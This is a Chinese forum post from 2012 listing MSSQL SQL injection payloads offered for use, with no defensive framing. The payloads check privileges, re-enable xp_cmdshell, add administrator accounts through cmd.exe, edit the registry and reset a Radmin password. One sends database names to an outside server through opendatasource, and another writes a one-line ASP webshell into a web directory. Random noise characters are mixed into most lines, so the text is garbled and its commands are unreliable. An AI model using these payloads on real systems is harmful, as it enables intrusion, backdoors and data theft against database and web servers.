找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1908|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的6 c  R5 w. E2 {, C$ [0 K! }; j4 x& A! V
and 1=(Select IS_MEMBER('db_owner'))( b( y6 ^) x' h7 Z4 b) U, A: b
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--0 S* D) d$ P$ A
* A' {$ `: E- V6 P
//检测是否有读取某数据库的权限
  W2 ^& o4 G' e9 J& ~; K, t$ X0 kand 1= (Select HAS_DBACCESS('master'))# P4 Q' X  J8 Z& Y+ v8 {
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --" f' f" m: G$ h, M6 T

; }1 @/ R$ H3 [' m+ u( h
2 ~  y7 P4 o. d- Y数字类型
, X1 O) w" j. M' D( o6 v; zand char(124)%2Buser%2Bchar(124)=02 L4 W% O% \& W+ R3 T

; S4 D3 Q4 F! O' }. O字符类型
9 J. ]: i+ i: `8 w) b' and char(124)%2Buser%2Bchar(124)=0 and ''='
7 d# J9 a3 i/ R. ^/ x& Z
# m& f6 q( U" `& E- v) t/ I3 ?搜索类型% C4 }$ t1 u6 `- |  e! W
' and char(124)%2Buser%2Bchar(124)=0 and '%'='  C& T, V$ |' Y  ~: v3 u4 U
5 |9 V1 l) e0 p' Y  R) w
爆用户名
% z8 @/ e" c7 ^1 uand user>0# ]. T' ^" g1 ^# C0 W8 w
' and user>0 and ''='
6 k8 B  H: ?6 X$ k% e, x
* d) S, x) m/ w" |检测是否为SA权限- f5 z  g+ `& d  {! z0 g( K1 x
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
" Z5 J( \- A1 x' D% a8 b+ @8 @2 SAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
; C% X2 Q9 I" A8 @
' \$ G9 C+ N4 P/ Q9 p+ T) u检测是不是MSSQL数据库
0 D1 C+ c9 Y! w/ h* z; `and exists (select * from sysobjects);--
, ]% P: u- X6 T
3 q4 i# ?" {- e2 ^检测是否支持多行
+ S' z8 G: H- U0 _5 z5 P" h;declare @d int;--1 l+ l( D8 d5 @3 s8 d; m
( `- u: A. P% t& g( j
恢复 xp_cmdshell
& \# u2 N, Q  x( N$ \2 f$ ?;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
' H" s& ]  @$ `7 B8 M5 g: ~' [- c$ R3 C, o
- _6 g( X4 _3 i* |2 J1 y9 |
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
: p' j5 L5 x, x( G8 N- A9 t9 \3 P3 c  G" P1 J- L- v
//-----------------------) A( b, k6 J; H3 x& c; C, v8 G( w
//       执行命令- p7 m( d3 b6 V$ O. J+ a% N: y7 O: `
//------------------------ W2 Z4 U5 q4 _* v: v/ x7 G
首先开启沙盘模式:
/ d: k7 S! B+ u' N6 R" Hexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1; r1 I" M. {3 U: e) k3 u
' _" o' N, q: Q) s
然后利用jet.oledb执行系统命令. ]; d; N( t+ }3 m
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')3 @9 f$ P. }# w' H5 C# C5 A- t* S' b
3 ?5 @, A+ b% J; y
执行命令
: l: [: S* E" }, n;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
* m$ l6 f& f7 _' N
. A" V9 w& r  h9 S& ^1 R* v0 Q7 u4 E5 ]EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'0 y5 ^* y+ u  C" r3 I' G0 {4 B

4 Q' X0 H% W; I* z0 K- N判断xp_cmdshell扩展存储过程是否存在:6 Z+ S* D1 q9 z8 Z7 N
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')" s/ U1 A% [* J" P

$ l+ G9 ?* k1 D& @( l" v: {写注册表1 \$ k4 V; d1 c0 w
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',15 n8 e$ z8 M3 W1 ^4 Y

! {/ q6 g2 G  t2 t, EREG_SZ) Z$ S7 X# J  u1 i
. ?: u8 P: B* G! I/ w
读注册表
7 N% U/ L' Z* z9 r9 J! texec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
* ]& n7 Y5 g, v' `' i3 o7 p. j, i2 J$ i3 O
读取目录内容. s' g) E* o9 v$ ^# z$ ^
exec master..xp_dirtree 'c:\winnt\system32\',1,1
7 u3 n# w0 N# E4 V3 G: S: i
! ^# {3 s( A' O; \$ W4 V& y% a. a- c. R4 L% b/ H2 B/ F5 D0 r
数据库备份
2 R5 s5 A3 C0 j3 ]2 u) a, L" nbackup database pubs to disk = 'c:\123.bak'; w! @7 h* d7 _* K7 b, h2 H& R

* d. A/ D! d" H" r//爆出长度* H' H* @$ |' j; U
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--2 y0 X) E; A3 _+ V  v$ s/ I" ]' R

8 z* [9 k1 e6 @
- U. U& g7 ]' q5 S9 }/ p9 D5 Q  R
' P: o4 D0 `& w2 s6 _3 c$ c8 f更改sa口令方法:用sql综合利用工具连接后,执行命令:
" J' b& u& L- I! n! E! zexec sp_password NULL,'新密码','sa'7 I, R* E% N; c" c- R
3 g- _0 W/ h' C& o& L
添加和删除一个SA权限的用户test:" S7 I( b8 o/ h5 O/ t8 |% ^4 S0 v
exec master.dbo.sp_addlogin test,95307724 A8 n1 w( {, g
exec master.dbo.sp_addsrvrolemember test,sysadmin
7 S1 }" D! {4 L; N' R" D$ b& B1 I' \8 m
删除扩展存储过过程xp_cmdshell的语句:' n2 h" o- D+ I; ?$ r' g
exec sp_dropextendedproc 'xp_cmdshell'
8 U# a$ @9 H' X0 \) c6 @6 A% f7 I3 @& F$ Q% H' P
添加扩展存储过过程. |3 _( W" e. X* v' M% H
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll', n7 x* a" C( f% {# \' L
GRANT exec On xp_proxiedadata TO public
4 b1 B8 e7 p. I- }
( F8 X- `7 w5 H5 E" N" E4 P
, |! ^. F% |- [4 |. j  S! d6 P停掉或激活某个服务。
0 G) P' g( V4 @8 g! T* ^' S2 s8 s& z6 W' E
exec master..xp_servicecontrol 'stop','schedule'$ J( i# G$ @6 W
exec master..xp_servicecontrol 'start','schedule'
; L1 [9 c) u, M# P4 |
/ O9 W& [+ ?- J) S" ?. K/ U/ C, vdbo.xp_subdirs$ M- s2 x6 b! G! Y. E* P# `1 \+ Y

2 I: H! x+ |7 i0 R( g只列某个目录下的子目录。
0 k, A3 [7 Y) W, @6 B' m, h4 ]3 l, Yxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'- |" l  @+ b, s; }$ |

3 V8 I0 o8 M6 [3 _. idbo.xp_makecab
4 U* l1 N' k: l8 t' C$ T  B% D4 o( F
将目标多个档案压缩到某个目标档案之内。
0 R) t* c% W# Y. Q3 u) E所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。4 G6 D" {  C& y6 t, O2 W

2 \- ]# V7 U0 a1 {5 `1 fdbo.xp_makecab
" }7 `  R3 ?( {6 Y2 d& X'c:\test.cab','mszip',1,, c/ v# C  F) @
'C:\Inetpub\wwwroot\SQLInject\login.asp',
; w* @; ]7 f5 _+ s0 X'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'4 B8 u# J6 ~3 E# M8 t$ ^9 A  |1 n

$ p& a+ x1 Z3 `. G! w2 w0 ~7 E# `/ Txp_terminate_process9 R9 u+ a" n( D1 c: o
5 Z+ h' U4 q6 i* m  [6 e
停掉某个执行中的程序,但赋予的参数是 Process ID。$ `* ]5 F" M- E% a, `& {
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID) F1 C& w& R: `0 h' h
! R; `; ]" ^" M9 E% \
xp_terminate_process 2484
4 k; Y5 A* M7 }; ?+ X
7 k0 x' M* P9 M6 ?% X7 S! [! O& wxp_unpackcab. U, X" z/ ^, a0 S5 Y0 Z& X: d/ N

; `9 _6 n7 y$ [! ~6 S4 j2 H解开压缩档。
: ~8 @# X# A8 G
/ a9 E  V  Y4 w5 `3 `6 g, F6 _xp_unpackcab 'c:\test.cab','c:\temp',13 X$ X5 a! W5 P" Q$ T6 {0 A

" E2 h' t, s# D
1 [" N) b* ?$ |+ p* b7 l某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
% D0 x- W/ [) H% H, X2 S! x! c3 P' G" i( }
create database lcx;
9 a5 A" ^' o7 @* bCreate TABLE ku(name nvarchar(256) null);. y8 p+ H7 p  t; y: ^  y9 B$ V
Create TABLE biao(id int NULL,name nvarchar(256) null);
. [# _+ V: f. r. K9 B9 S. f" |% X7 l
//得到数据库名
' m' b3 p7 N7 ?9 x/ |insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases" F& C5 z  g; u; e4 |% z

9 G" O; u# `4 b9 A! x2 n( {" y0 b: t* k4 J: e) _" n# j2 y  i
//在Master中创建表,看看权限怎样
' s' y% J! j8 ?8 P. jCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
# O% E& Z5 }6 l
, S$ m7 ~% M; B; o2 a4 Y3 o用 sp_makewebtask直接在web目录里写入一句话马:
* K; G  |7 ]* Y% @' s! Dhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
7 y1 b/ i0 }; W' ~- n$ l0 U: }; o: r( {: Y
//更新表内容
+ D4 T& l, h& D( ], P( u6 gUpdate films SET kind = 'Dramatic' Where id = 123: R: R" [' e, `- i! i

9 O- F; d3 H( v" Y- [//删除内容
' j5 @, I7 z  }3 L* Pdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表